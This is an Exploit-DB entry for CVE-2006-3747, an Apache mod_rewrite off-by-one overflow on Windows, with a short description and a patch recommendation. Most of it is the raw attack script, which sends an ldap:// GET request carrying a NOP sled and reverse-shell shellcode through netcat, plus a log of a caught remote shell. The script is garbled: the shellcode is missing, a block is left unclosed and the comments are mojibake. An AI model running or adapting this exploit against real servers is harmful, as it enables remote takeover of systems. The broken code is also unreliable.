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Apache mod_rewrite off-by-one(Win32) Exploit

This exploit targets the Apache mod_rewrite vulnerability on Win32 systems. It allows an attacker to trigger a buffer overflow through the 'ldap://' parameter in the GET request. The vulnerability was discovered by Mark Dowd and assigned CVE-2006-3747. The exploit does not require any opcodes under Windows and directly runs the attacker's shellcode. The vulnerable Apache versions are 1.3 branch (>1.3.28 and <1.3.37), 2.0 branch (>2.0.46 and <2.0.59), and 2.2 branch (>2.2.0 and <2.2.3). Some compilers may add padding to the stack, making them non-exploitable.


Apply the necessary patches or updates to the Apache server to address the vulnerability. Upgrading to a non-vulnerable version is recommended.

Exploit-DB raw data:

# Exploit for Apache mod_rewrite off-by-one(Win32).
# by axis <axis@ph4nt0m>
# http://www.ph4nt0m.org
# 2007-04-06
# Tested on Apache 2.0.58 (Win32)
# Windows2003 CN SP1
# Vulnerable Apache Versions:
# * 1.3 branch: >1.3.28 and <1.3.37
# * 2.0 branch: >2.0.46 and <2.0.59
# * 2.2 branch: >2.2.0 and <2.2.3
# Vulnerability discovered by Mark Dowd.
# CVE-2006-3747
# first POC by jack <jack\x40gulcas\x2Eorg>
# 2006-08-20
# http://www.milw0rm.com/exploits/2237
# to successfully exploit the vuln,there are some conditions
# http://www.vuxml.org/freebsd/dc8c08c7-1e7c-11db-88cf-000c6ec775d9.html
# some compilers added padding to the stack, so they could not be exploited,like gcc under redhat
# for more details about the vuln please see:
# http://www.securityfocus.com/archive/1/archive/1/443870/100/0/threaded
# no opcodes needed under windows!
# it will directly run our shellcode
# my apache config file
# [httpd.conf]:
# RewriteEngine on
# RewriteRule 1/(.*) $1
# RewriteLog "logs/rewrite.log"
# RewriteLogLevel 3
# Usage:
# [axis@security-lab2 xploits]$ sh mod_rewrite.sh
# mod_rewrite apache off-by-one overflow
# [axis@opensystemX axis]$ nc -vv -n -l -p 1154
# listening on [any] 1154 ...
# connect to [x.x.x.111] from (UNKNOWN) [] 4077
# Microsoft Windows [¡ã?¡À? 5.2.3790]
# (C) ¡ã?¨¨¡§?¨´¨®D 1985-2003 Microsoft Corp.
# D:\Apache\Apache2>exit
# exit
#  sent 5, rcvd 100
# shellcode µÄbadchar£¬ÎÒÕâÀïÓõģ¬Æäʵ²»ÐèÒªÄÇô¶à
# ÎÒ¸úµ½Á½¸öbadcharÊÇ 0x3fºÍ 0x0b ÆäËû¶¼ÊÇÒÔÇ°Éú³ÉshellcodeÏ°¹ßÐÔ±£ÁôµÄ
# 0x00 0x3a 0x22 0x3b 0x7d 0x7b 0x3c 0x3e 0x5c 0x5d 0x3f 0x0b

echo -e "mod_rewrite apache off-by-one overflow"

if [ $# -ne 1 ] ; then
  echo "Usage: $0 webserver"


#use ldap:// to trigger the vuln, "Ph4nt0m" is any arbitrary string
echo -ne "GET /1/ldap://ph4nt0m/`perl -e 'print "Ph4nt0m"x5'`\  
# %3f to trigger the vuln
#string "CCCC.." is any arbitrary string, use %3f to trigger the vuln
#%90 is the machine code we will jmp to(NOP),run shellcode from here
`perl -e 'print "C"x10'`%3fC%3f%90\    
# shellcode,reverse shell to ,port 1154  alpha2 encoded
`perl -e 'print "\    
Host: $host\r\n\r\n" | nc -vv $host 80

# milw0rm.com [2007-04-07]